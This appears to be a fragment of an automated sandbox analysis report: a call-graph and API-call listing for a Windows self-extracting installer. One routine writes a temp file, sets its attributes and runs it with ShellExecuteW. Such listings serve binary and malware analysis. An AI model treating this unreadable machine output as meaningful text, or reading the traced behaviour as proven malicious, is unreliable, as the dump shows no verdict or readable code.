9536->9544 9546 403330 9536->9546 9547 4032b2 lstrcmpW 9536->9547 9551 401329 2 API calls 9536->9551 9946 402986 9536->9946 9951 4023dd 9536->9951 9955 402425 ??3@YAXPAX ??3@YAXPAX 9536->9955 9539 403252 ??3@YAXPAX 9537->9539 9538->9535 9540 402a69 9 API calls 9539->9540 9542 403263 lstrcmpW 9540->9542 9541->9536 9542->9536 9544->9536 9549 402f6c 7 API calls 9546->9549 9547->9536 9548 4032c0 lstrcmpW 9547->9548 9548->9536 9550 40333c 9549->9550 9974 402425 ??3@YAXPAX ??3@YAXPAX 9550->9974 9551->9536 9554 40243b lstrcmpW 9553->9554 9555 40461c 9554->9555 9556 40466c 9555->9556 9558 401329 2 API calls 9555->9558 9557 40243b lstrcmpW 9556->9557 9559 40468a 9557->9559 9560 404633 9558->9560 9563 40243b lstrcmpW 9559->9563 9561 401f9d 19 API calls 9560->9561 9562 40463a 9561->9562 9565 40254d 2 API calls 9562->9565 9564 4046a2 9563->9564 9567 40243b lstrcmpW 9564->9567 9566 404643 9565->9566 9568 401329 2 API calls 9566->9568 9569 4046ba 9567->9569 9570 40465c 9568->9570 9572 40243b lstrcmpW 9569->9572 9571 401f9d 19 API calls 9570->9571 9573 404663 9571->9573 9574 4046d2 9572->9574 9575 40254d 2 API calls 9573->9575 9576 4046e9 9574->9576 9577 4046d9 lstrcmpiW 9574->9577 9575->9556 9578 40243b lstrcmpW 9576->9578 9577->9576 9579 4046ff 9578->9579 9580 40243b lstrcmpW 9579->9580 9581 40472c 9580->9581 9582 404739 9581->9582 9976 403d1f 9581->9976 9584 40243b lstrcmpW 9582->9584 9588 40474d 9584->9588 9585 40476d 9586 40243b lstrcmpW 9585->9586 9593 404780 9586->9593 9588->9585 9589 40243b lstrcmpW 9588->9589 9980 403cc6 9588->9980 9589->9588 9590 4047a0 9592 40243b lstrcmpW 9590->9592 9594 4047ac 9592->9594 9593->9590 9595 40243b lstrcmpW 9593->9595 9984 403cf7 9593->9984 9596 40243b lstrcmpW 9594->9596 9595->9593 9597 4047bd 9596->9597 9598 40243b lstrcmpW 9597->9598 9599 4047ce 9598->9599 9600 4047e4 9599->9600 9601 4047db _wtol 9599->9601 9602 40243b lstrcmpW 9600->9602 9601->9600 9603 4047f0 9602->9603 9604 404800 9603->9604 9605 4047f7 _wtol 9603->9605 9606 40243b lstrcmpW 9604->9606 9605->9604 9607 40480c 9606->9607 9608 40243b lstrcmpW 9607->9608 9609 404824 9608->9609 9610 40243b lstrcmpW 9609->9610 9611 40483c 9610->9611 9611->9262 9613 4023dd lstrcmpW 9612->9613 9614 40244c 9613->9614 9614->9268 9616 404045 9615->9616 9617 404088 9615->9617 9618 4012f7 2 API calls 9616->9618 9619 403b7f 19 API calls 9616->9619 9617->9245 9617->9246 9618->9616 9620 404062 SetEnvironmentVariableW ??3@YAXPAX 9619->9620 9620->9616 9620->9617 9622 40393b 7 API calls 9621->9622 9623 403b69 9622->9623 9624 4039f6 7 API calls 9623->9624 9625 403b74 9624->9625 9626 4027c7 6 API calls 9625->9626 9627 403b7a 9626->9627 9627->9266 9739 4083b6 9627->9739 9992 408676 9628->9992 9630 404a55 ??2@YAPAXI 9631 404a64 9630->9631 9645 40dcfb 3 API calls 9631->9645 9632 404a85 9994 40a7de _EH_prolog 9632->9994 10010 40b2fc 9632->10010 9633 404a95 9634 404ab3 9633->9634 9635 404a99 9633->9635 9637 404ada ??2@YAPAXI 9634->9637 9641 403354 86 API calls 9634->9641 9636 407776 55 API calls 9635->9636 9640 404aa1 9636->9640 9638 404ae6 9637->9638 9639 404aed 9637->9639 10035 404292 9638->10035 10016 40150b 9639->10016 9640->9312 9643 404ac6 9641->9643 9643->9637 9643->9640 9645->9632 9649 402200 LoadLibraryA GetProcAddress 9648->9649 9650 4021fb 9648->9650 9651 40221b 9649->9651 9652 402223 9649->9652 9650->9410 9650->9415 9650->9416 9651->9650 9652->9651 10498 4021b9 LoadLibraryA GetProcAddress 9652->10498 9655 40661a 2 API calls 9654->9655 9656 4049af 9655->9656 9657 401f9d 19 API calls 9656->9657 9658 4049bd 9657->9658 9659 4024fc 2 API calls 9658->9659 9660 4049c7 9659->9660 9661 4049fd 9660->9661 9663 40254d ??2@YAPAXI ??3@YAXPAX 9660->9663 9662 40254d 2 API calls 9661->9662 9664 404a0a 9662->9664 9663->9660 9665 401f9d 19 API calls 9664->9665 9666 404a11 9665->9666 9667 40254d 2 API calls 9666->9667 9668 404a1b 9667->9668 9669 4073d1 21 API calls 9668->9669 9670 404a30 ??3@YAXPAX 9669->9670 9671 404a41 9670->9671 9671->9170 9673 40e8da 3 API calls 9672->9673 9674 403e7e 9673->9674 9675 40e8da 3 API calls 9674->9675 9676 40e943 ??3@YAXPAX 9675->9676 9676->9164 9678 40db53 2 API calls 9677->9678 9679 404ce8 9678->9679 9680 404d44 9679->9680 9682 4024fc 2 API calls 9679->9682 9681 4025ae 2 API calls 9680->9681 9683 404d4c 9681->9683 9684 404cf7 9682->9684 9685 403e86 2 API calls 9683->9685 9688 404db5 ??3@YAXPAX 9684->9688 9690 403354 86 API calls 9684->9690 9686 404d59 9685->9686 9687 403ef6 2 API calls 9686->9687 9689 404d66 9687->9689 9702 404db1 9688->9702 9691 403ef6 2 API calls 9689->9691 9692 404d1b 9690->9692 9693 404d73 9691->9693 9692->9688 9695 40db53 2 API calls 9692->9695 9694 403ef6 2 API calls 9693->9694 9696 404d80 9694->9696 9697 404d37 9695->9697 9698 40dd5f 2 API calls 9696->9698 9697->9688 9699 404d3b ??3@YAXPAX 9697->9699 9700 404d94 9698->9700 9699->9680 9700->9688 9701 404d9d ??3@YAXPAX 9700->9701 9701->9702 9702->9229 9704 402f86 9703->9704 9705 402f7b 9703->9705 9707 408761 4 API calls 9704->9707 10500 402668 9705->10500 9708 402f92 9707->9708 9708->9219 9709->9219 9711 4024fc 2 API calls 9710->9711 9712 40485f 9711->9712 9713 40254d 2 API calls 9712->9713 9714 40486c 9713->9714 9715 404888 9714->9715 9716 401429 2 API calls 9714->9716 9717 40254d 2 API calls 9715->9717 9716->9714 9718 404892 9717->9718 9719 40408b 94 API calls 9718->9719 9720 40489d ??3@YAXPAX 9719->9720 9720->9262 9722 4040a2 lstrlenW 9721->9722 9723 4040ce 9721->9723 9724 401a85 4 API calls 9722->9724 9723->9262 9725 4040b8 9724->9725 9725->9722 9725->9723 9726 4040d5 9725->9726 9727 4024fc 2 API calls 9726->9727 9730 4040de 9727->9730 10505 402776 9730->10505 9731 403093 84 API calls 9732 40414c 9731->9732 9733 404156 ??3@YAXPAX ??3@YAXPAX 9732->9733 9734 40416d ??3@YAXPAX ??3@YAXPAX 9732->9734 9733->9723 9734->9723 9735->9276 9737 40661a 2 API calls 9736->9737 9738 403b48 9737->9738 9738->9264 9740 408646 9739->9740 9752 4083d5 9739->9752 9740->9270 9741 40243b lstrcmpW 9741->9752 9742 40661a 2 API calls 9742->9752 9743 40786b 23 API calls 9743->9752 9745 407674 23 API calls 9745->9752 9746 407613 23 API calls 9746->9752 9747 403b40 2 API calls 9747->9752 9748 401f9d 19 API calls 9748->9752 9749 407776 55 API calls 9749->9752 9750 403f48 4 API calls 9750->9752 9751 4073d1 21 API calls 9751->9752 9752->9740 9752->9741 9752->9742 9752->9743 9752->9745 9752->9746 9752->9747 9752->9748 9752->9749 9752->9750 9752->9751 9753 407717 25 API calls 9752->9753 9754 4073d1 21 API calls 9752->9754 10515 40744b 9752->10515 9753->9752 9755 408476 ??3@YAXPAX 9754->9755 9755->9752 9757 40243b lstrcmpW 9756->9757 9758 4082fd 9757->9758 9759 40830b 9758->9759 10519 4019f0 GetStdHandle WriteFile 9758->10519 9761 40831e 9759->9761 10520 4019f0 GetStdHandle WriteFile 9759->10520 9766 408333 9761->9766 10521 4019f0 GetStdHandle WriteFile 9761->10521 9765 40243b lstrcmpW 9768 408351 9765->9768 9767 408344 9766->9767 10522 4019f0 GetStdHandle WriteFile 9766->10522 9767->9765 9769 40835f 9768->9769 10523 4019f0 GetStdHandle WriteFile 9768->10523 9771 40243b lstrcmpW 9769->9771 9772 40836c 9771->9772 9773 40837a 9772->9773 10524 4019f0 GetStdHandle WriteFile 9772->10524 9775 40243b lstrcmpW 9773->9775 9776 408387 9775->9776 9777 408395 9776->9777 10525 4019f0 GetStdHandle WriteFile 9776->10525 9779 40243b lstrcmpW 9777->9779 9780 4083a2 9779->9780 9781 4083b2 9780->9781 10526 4019f0 GetStdHandle WriteFile 9780->10526 9781->9266 9784 407636 9783->9784 9785 407658 9784->9785 9786 40764b 9784->9786 10530 407186 9785->10530 10527 407154 9786->10527 9789 407653 9790 4073d1 21 API calls 9789->9790 9791 407671 9790->9791 9791->9310 9793 407689 9792->9793 9794 40716d 2 API calls 9793->9794 9795 407694 9794->9795 9796 4073d1 21 API calls 9795->9796 9797 4076a5 9796->9797 9797->9310 9799 401411 2 API calls 9798->9799 9800 403f96 9799->9800 9801 402535 2 API calls 9800->9801 9802 403f9f GetTempPathW 9801->9802 9803 403fb8 9802->9803 9807 403fcf 9802->9807 9804 402535 2 API calls 9803->9804 9805 403fc3 GetTempPathW 9804->9805 9805->9807 9806 402535 2 API calls 9808 403ff2 wsprintfW 9806->9808 9807->9806 9809 404009 GetFileAttributesW 9807->9809 9810 40402d 9807->9810 9808->9807 9809->9807 9809->9810 9810->9295 9812 40787e 9811->9812 10536 40719f 9812->10536 9815 4073d1 21 API calls 9816 4078b3 9815->9816 9816->9312 9818 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9817->9818 9819 403e16 9817->9819 9818->9313 9820 402c86 16 API calls 9819->9820 9820->9818 9822 40243b lstrcmpW 9821->9822 9823 40455d 9822->9823 9824 404592 9823->9824 9825 401329 2 API calls 9823->9825 9824->9364 9826 40456c 9825->9826 9827 403b7f 19 API calls 9826->9827 9828 404572 9827->9828 9828->9824 9829 401429 2 API calls 9828->9829 9829->9824 9831 4012f7 2 API calls 9830->9831 9832 4043d4 9831->9832 9833 40254d 2 API calls 9832->9833 9834 4043df 9833->9834 9834->9353 9836 4021a9 9835->9836 9837 40218e LoadLibraryA GetProcAddress 9835->9837 9836->9410 9837->9836 9839 401411 2 API calls 9838->9839 9846 4048bc 9839->9846 9840 401329 2 API calls 9840->9846 9841 40494e 9842 404988 ??3@YAXPAX 9841->9842 9844 4048ab 3 API calls 9841->9844 9842->9363 9843 401429 2 API calls 9843->9846 9845 404985 9844->9845 9845->9842 9846->9840 9846->9841 9846->9843 9847 40243b lstrcmpW 9846->9847 9847->9846 9849 40661a 2 API calls 9848->9849 9850 403f50 9849->9850 9851 401411 2 API calls 9850->9851 9852 403f5e 9851->9852 9852->9338 9854 404cb1 ??3@YAXPAX 9853->9854 9855 404b15 9853->9855 9857 404cb7 9854->9857 9855->9854 9856 404b29 GetDriveTypeW 9855->9856 9856->9854 9858 404b55 9856->9858 9857->9323 9859 403f85 6 API calls 9858->9859 9860 404b63 CreateFileW 9859->9860 9861 404b89 9860->9861 9862 404c7b ??3@YAXPAX ??3@YAXPAX 9860->9862 9863 401411 2 API calls 9861->9863 9862->9857 9864 404b92 9863->9864 9865 401329 2 API calls 9864->9865 9866 404b9f 9865->9866 9867 40254d 2 API calls 9866->9867 9868 404bad 9867->9868 9869 4013e2 2 API calls 9868->9869 9870 404bb9 9869->9870 9871 40254d 2 API calls 9870->9871 9872 404bc7 9871->9872 9873 40254d 2 API calls 9872->9873 9874 404bd4 9873->9874 9875 4013e2 2 API calls 9874->9875 9876 404be0 9875->9876 9877 40254d 2 API calls 9876->9877 9878 404bed 9877->9878 9879 40254d 2 API calls 9878->9879 9880 404bf6 9879->9880 9881 4013e2 2 API calls 9880->9881 9882 404c02 9881->9882 9883 40254d 2 API calls 9882->9883 9884 404c0b 9883->9884 9885 402776 3 API calls 9884->9885 9886 404c1d WriteFile ??3@YAXPAX CloseHandle 9885->9886 9887 404c4b 9886->9887 9888 404c8c 9886->9888 9887->9888 9889 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9887->9889 9890 402c86 16 API calls 9888->9890 9889->9862 9891 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9890->9891 9891->9857 9901 4022b0 9892->9901 9896 401411 2 API calls 9895->9896 9897 40273a 9896->9897 9898 402772 9897->9898 9899 402535 2 API calls 9897->9899 9898->9453 9900 402757 MultiByteToWideChar 9899->9900 9900->9898 9902 4022ea 9901->9902 9903 4022be ??2@YAPAXI 9901->9903 9902->9453 9903->9902 9904 4022cf ??3@YAXPAX 9903->9904 9904->9902 9907 401ae3 9906->9907 9910 401a97 9906->9910 9907->9460 9908 401abc CharUpperW CharUpperW 9909 401af3 CharUpperW CharUpperW 9908->9909 9908->9910 9909->9907 9910->9907 9910->9908 9911->9479 9913 403e9e 9912->9913 9914 4022b0 2 API calls 9913->9914 9915 403eac 9914->9915 9915->9493 9917 40435e 9916->9917 9918 404375 9917->9918 9919 40436a 9917->9919 9920 4025ae 2 API calls 9918->9920 9936 4025f6 9919->9936 9921 40437e 9920->9921 9923 4022b0 2 API calls 9921->9923 9925 404387 9923->9925 9924 404373 9928 403ec1 9924->9928 9926 4025f6 2 API calls 9925->9926 9927 4043b5 ??3@YAXPAX 9926->9927 9927->9924 9929 403ecd 9928->9929 9931 403ede 9928->9931 9930 4022b0 2 API calls 9929->9930 9930->9931 9931->9499 9933 403f06 9932->9933 9939 4022fc 9933->9939 9935 403f13 9935->9505 9937 4022b0 2 API calls 9936->9937 9938 402610 9937->9938 9938->9924 9940 402340 9939->9940 9941 402310 9939->9941 9940->9935 9942 4022b0 2 API calls 9941->9942 9942->9940 9944 4022fc 2 API calls 9943->9944 9945 40264a 9944->9945 9945->9515 9947 4025ae 2 API calls 9946->9947 9948 402992 9947->9948 9949 4029be 9948->9949 9950 402640 2 API calls 9948->9950 9949->9536 9950->9948 9954 4023e8 9951->9954 9952 4023f4 lstrcmpW 9953 402411 9952->9953 9952->9954 9953->9536 9954->9952 9954->9953 9955->9536 9957 4029d2 9956->9957 9958 4029de 9956->9958 9975 4019f0 GetStdHandle WriteFile 9957->9975 9960 4025ae 2 API calls 9958->9960 9964 4029e8 9960->9964 9961 4029d9 9973 402425 ??3@YAXPAX ??3@YAXPAX 9961->9973 9962 402a13 9963 40272e 3 API calls 9962->9963 9965 402a25 9963->9965 9964->9962 9968 402640 2 API calls 9964->9968 9966 402a33 9965->9966 9967 402a47 9965->9967 9969 407776 55 API calls 9966->9969 9970 407776 55 API calls 9967->9970 9968->9964 9971 402a42 ??3@YAXPAX ??3@YAXPAX 9969->9971 9970->9971 9971->9961 9973->9533 9974->9522 9975->9961 9977 403d3d 9976->9977 9988 403c63 9977->9988 9981 403cd3 9980->9981 9982 403c63 _wtol 9981->9982 9983 403cf4 9982->9983 9983->9588 9985 403d04 9984->9985 9986 403c63 _wtol 9985->9986 9987 403d1c 9986->9987 9987->9593 9989 403c6d 9988->9989 9990 403c88 _wtol 9989->9990 9991 403cc1 9989->9991 9990->9989 9991->9582 9993 408679 9992->9993 9993->9630 9995 40a7fe 9994->9995 9996 40b2fc 11 API calls 9995->9996 9997 40a823 9996->9997 9998 40a845 9997->9998 9999 40a82c 9997->9999 10040 40cc59 _EH_prolog 9998->10040 10043 40a3fe 9999->10043 10011 40b30d 10010->10011 10015 40dcfb 3 API calls 10011->10015 10012 40b321 10013 40b331 10012->10013 10479 40b163 10012->10479 10013->9633 10015->10012 10017 40151e 10016->10017 10018 401329 2 API calls 10017->10018 10019 40152b 10018->10019 10020 401429 2 API calls 10019->10020 10021 401534 CreateThread 10020->10021 10022 401563 10021->10022 10023 401568 WaitForSingleObject 10021->10023 10492 40129c 10021->10492 10024 40786b 23 API calls 10022->10024 10025 401585 10023->10025 10026 4015b7 10023->10026 10024->10023 10029 4015a3 10025->10029 10032 401594 10025->10032 10027 4015b3 10026->10027 10028 4015bf GetExitCodeThread 10026->10028 10027->9640 10030 4015d6 10028->10030 10031 407776 55 API calls 10029->10031 10030->10027 10030->10032 10033 401605 SetLastError 10030->10033 10031->10027 10032->10027 10034 407776 55 API calls 10032->10034 10033->10032 10034->10027 10036 401411 2 API calls 10035->10036 10037 4042ab 10036->10037 10038 401411 2 API calls 10037->10038 10039 4042b7 10038->10039 10039->9639 10051 40c9fc 10040->10051 10462 40a28e 10043->10462 10073 40a0bf 10051->10073 10207 40a030 10073->10207 10208 40e8da 3 API calls 10207->10208 10209 40a039 10208->10209 10210 40e8da 3 API calls 10209->10210 10211 40a041 10210->10211 10212 40e8da 3 API calls 10211->10212 10213 40a049 10212->10213 10214 40e8da 3 API calls 10213->10214 10215 40a051 10214->10215 10216 40e8da 3 API calls 10215->10216 10217 40a059 10216->10217 10218 40e8da 3 API calls 10217->10218 10219 40a061 10218->10219 10220 40e8da 3 API calls 10219->10220 10221 40a06b 10220->10221 10222 40e8da 3 API calls 10221->10222 10223 40a073 10222->10223 10224 40e8da 3 API calls 10223->10224 10225 40a080 10224->10225 10226 40e8da 3 API calls 10225->10226 10227 40a088 10226->10227 10228 40e8da 3 API calls 10227->10228 10229 40a095 10228->10229 10230 40e8da 3 API calls 10229->10230 10231 40a09d 10230->10231 10232 40e8da 3 API calls 10231->10232 10233 40a0aa 10232->10233 10234 40e8da 3 API calls 10233->10234 10235 40a0b2 10234->10235 10463 40e8da 3 API calls 10462->10463 10464 40a29c 10463->10464 10480 40f0b6 GetLastError 10479->10480 10482 40b17e 10480->10482 10481 40b192 10481->10013 10482->10481 10483 40adc3 3 API calls 10482->10483 10484 40b1b6 memcpy 10483->10484 10489 40b1d9 10484->10489 10485 40b297 ??3@YAXPAX 10485->10481 10486 40b2a2 ??3@YAXPAX 10486->10481 10488 40b27a memmove 10488->10489 10489->10485 10489->10486 10489->10488 10490 40b2ac memcpy 10489->10490 10491 40dcfb 3 API calls 10490->10491 10491->10486 10493 4012a5 10492->10493 10494 4012b8 10492->10494 10493->10494 10495 4012a7 Sleep 10493->10495 10496 4012f1 10494->10496 10497 4012e3 EndDialog 10494->10497 10495->10493 10497->10496 10499 4021db 10498->10499 10499->9651 10501 4012f7 2 API calls 10500->10501 10502 402676 10501->10502 10503 4012f7 2 API calls 10502->10503 10504 402682 10503->10504 10504->9704 10506 4025ae 2 API calls 10505->10506 10507 402785 10506->10507 10508 4027c1 10507->10508 10511 402628 10507->10511 10508->9731 10512 402634 10511->10512 10513 40263a WideCharToMultiByte 10511->10513 10514 4022b0 2 API calls 10512->10514 10513->10508 10514->10513 10516 407456 10515->10516 10517 40745b 10515->10517 10516->9752 10517->10516 10518 4073d1 21 API calls 10517->10518 10518->10516 10519->9759 10520->9761 10521->9766 10522->9767 10523->9769 10524->9773 10525->9777 10526->9781 10528 40661a 2 API calls 10527->10528 10529 40715c 10528->10529 10529->9789 10533 40716d 10530->10533 10534 40661a 2 API calls 10533->10534 10535 407175 10534->10535 10535->9789 10537 40661a 2 API calls 10536->10537 10538 4071a7 10537->10538 10538->9815 8037 40f3f1 8040 4024e7 8037->8040 8045 40245a 8040->8045 8043 4024f5 8044 4024f6 malloc 8046 40246a 8045->8046 8052 402466 8045->8052 8047 40247a GlobalMemoryStatusEx 8046->8047 8046->8052 8048 402488 8047->8048 8047->8052 8048->8052 8053 401f9d 8048->8053 8052->8043 8052->8044 8057 401fb4 8053->8057 8054 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8055 402095 SetLastError 8054->8055 8056 40201d ??2@YAPAXI GetEnvironmentVariableW 8054->8056 8060 401fdb 8055->8060 8061 4020ac 8055->8061 8058 40207e ??3@YAXPAX 8056->8058 8059 40204c GetLastError 8056->8059 8057->8054 8057->8060 8067 402081 8058->8067 8059->8058 8062 402052 8059->8062 8073 407717 8060->8073 8064 4020cb lstrlenA ??2@YAPAXI 8061->8064 8080 401f47 8061->8080 8062->8067 8068 40205c lstrcmpiW 8062->8068 8065 402136 MultiByteToWideChar 8064->8065 8066 4020fc GetLocaleInfoW 8064->8066 8065->8060 8066->8065 8071 402123 _wtol 8066->8071 8067->8055 8068->8058 8072 40206b ??3@YAXPAX 8068->8072 8070 4020c1 8070->8064 8071->8065 8072->8067 8087 40661a 8073->8087 8076 40774e 8091 4073d1 8076->8091 8077 40773c IsBadReadPtr 8077->8076 8081 401f51 GetUserDefaultUILanguage 8080->8081 8082 401f95 8080->8082 8083 401f72 GetSystemDefaultUILanguage 8081->8083 8084 401f6e 8081->8084 8082->8070 8083->8082 8085 401f7e GetSystemDefaultLCID 8083->8085 8084->8070 8085->8082 8086 401f8e 8085->8086 8086->8082 8088 406643 8087->8088 8089 40666f IsWindow 8087->8089 8088->8089 8090 40664b GetSystemMetrics GetSystemMetrics 8088->8090 8089->8076 8089->8077 8090->8089 8092 4073e0 8091->8092 8093 407444 8091->8093 8092->8093 8103 4024fc 8092->8103 8093->8052 8095 4073f1 8096 4024fc 2 API calls 8095->8096 8097 4073fc 8096->8097 8107 403b7f 8097->8107 8100 403b7f 19 API calls 8101 40740e ??3@YAXPAX ??3@YAXPAX 8100->8101 8101->8093 8104 402513 8103->8104 8116 40112b 8104->8116 8106 40251e 8106->8095 8180 403880 8107->8180 8109 403b59 8121 40393b 8109->8121 8111 403b69 8144 4039f6 8111->8144 8113 403b74 8167 4027c7 8113->8167 8117 401177 8116->8117 8118 401139 ??2@YAPAXI 8116->8118 8117->8106 8118->8117 8120 40115a 8118->8120 8119 40116f ??3@YAXPAX 8119->8117 8120->8119 8120->8120 8203 401411 8121->8203 8125 403954 8210 40254d 8125->8210 8127 403961 8128 4024fc 2 API calls 8127->8128 8129 40396e 8128->8129 8214 403805 8129->8214 8132 401362 2 API calls 8133 403992 8132->8133 8134 40254d 2 API calls 8133->8134 8135 40399f 8134->8135 8136 4024fc 2 API calls 8135->8136 8137 4039ac 8136->8137 8138 403805 3 API calls 8137->8138 8139 4039bc ??3@YAXPAX 8138->8139 8140 4024fc 2 API calls 8139->8140 8141 4039d3 8140->8141 8142 403805 3 API calls 8141->8142 8143 4039e2 ??3@YAXPAX ??3@YAXPAX 8142->8143 8143->8111 8145 401411 2 API calls 8144->8145 8146 403a04 8145->8146 8147 401362 2 API calls 8146->8147 8148 403a0f 8147->8148 8149 40254d 2 API calls 8148->8149 8150 403a1c 8149->8150 8151 4024fc 2 API calls 8150->8151 8152 403a29 8151->8152 8153 403805 3 API calls 8152->8153 8154 403a39 ??3@YAXPAX 8153->8154 8155 401362 2 API calls 8154->8155 8156 403a4d 8155->8156 8157 40254d 2 API calls 8156->8157 8158 403a5a 8157->8158 8159 4024fc 2 API calls 8158->8159 8160 403a67 8159->8160 8161 403805 3 API calls 8160->8161 8162 403a77 ??3@YAXPAX 8161->8162 8163 4024fc 2 API calls 8162->8163 8164 403a8e 8163->8164 8165 403805 3 API calls 8164->8165 8166 403a9d ??3@YAXPAX ??3@YAXPAX 8165->8166 8166->8113 8168 401411 2 API calls 8167->8168 8169 4027d5 8168->8169 8170 4027e5 ExpandEnvironmentStringsW 8169->8170 8171 40112b 2 API calls 8169->8171 8172 402809 8170->8172 8173 4027fe ??3@YAXPAX 8170->8173 8171->8170 8239 402535 8172->8239 8174 402840 8173->8174 8174->8100 8177 402824 8178 401362 2 API calls 8177->8178 8179 402838 ??3@YAXPAX 8178->8179 8179->8174 8181 401411 2 API calls 8180->8181 8182 40388e 8181->8182 8183 401362 2 API calls 8182->8183 8184 403899 8183->8184 8185 40254d 2 API calls 8184->8185 8186 4038a6 8185->8186 8187 4024fc 2 API calls 8186->8187 8188 4038b3 8187->8188 8189 403805 3 API calls 8188->8189 8190 4038c3 ??3@YAXPAX 8189->8190 8191 401362 2 API calls 8190->8191 8192 4038d7 8191->8192 8193 40254d 2 API calls 8192->8193 8194 4038e4 8193->8194 8195 4024fc 2 API calls 8194->8195 8196 4038f1 8195->8196 8197 403805 3 API calls 8196->8197 8198 403901 ??3@YAXPAX 8197->8198 8199 4024fc 2 API calls 8198->8199 8200 403918 8199->8200 8201 403805 3 API calls 8200->8201 8202 403927 ??3@YAXPAX ??3@YAXPAX 8201->8202 8202->8109 8204 40112b 2 API calls 8203->8204 8205 401425 8204->8205 8206 401362 8205->8206 8207 40136e 8206->8207 8209 401380 8206->8209 8208 40112b 2 API calls 8207->8208 8208->8209 8209->8125 8211 40255a 8210->8211 8219 401398 8211->8219 8213 402565 8213->8127 8215 40381b 8214->8215 8216 403817 ??3@YAXPAX 8214->8216 8215->8216 8223 4026b1 8215->8223 8227 402f96 8215->8227 8216->8132 8220 4013dc 8219->8220 8221 4013ac 8219->8221 8220->8213 8222 40112b 2 API calls 8221->8222 8222->8220 8224 4026c7 8223->8224 8225 4026db 8224->8225 8231 402346 memmove 8224->8231 8225->8215 8228 402fa5 8227->8228 8230 402fbe 8228->8230 8232 4026e6 8228->8232 8230->8215 8231->8225 8233 4026f6 8232->8233 8234 401398 2 API calls 8233->8234 8235 402702 8234->8235 8238 402346 memmove 8235->8238 8237 40270f 8237->8230 8238->8237 8240 402541 8239->8240 8241 402547 ExpandEnvironmentStringsW 8239->8241 8242 40112b 2 API calls 8240->8242 8241->8177 8242->8241 11204 40e4f9 11205 40e516 11204->11205 11206 40e506 11204->11206 11209 40de46 11206->11209 11212 401b1f VirtualFree 11209->11212 11211 40de81 ??3@YAXPAX 11211->11205 11212->11211
                                                                APIs
                                                                  • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                  • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                  • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                  • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                  • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                                                  • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                  • Part of subcall function 00401B37: DestroyWindow.USER32(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                                                • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                                                  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                                                • _wtol.MSVCRT ref: 0040509F
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                                                • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                                                • _wtol.MSVCRT ref: 00405217
                                                                • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                                                  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                  • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                                  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                  • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                  • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                  • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
